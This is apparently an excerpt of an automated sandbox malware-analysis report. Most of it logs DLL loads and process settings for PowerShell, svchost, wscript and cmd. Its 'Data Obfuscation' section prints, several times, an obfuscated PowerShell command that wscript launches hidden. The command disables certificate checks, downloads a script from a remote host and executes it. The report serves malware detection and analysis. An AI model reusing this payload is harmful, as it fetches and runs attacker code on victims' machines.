Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) "
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) "Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
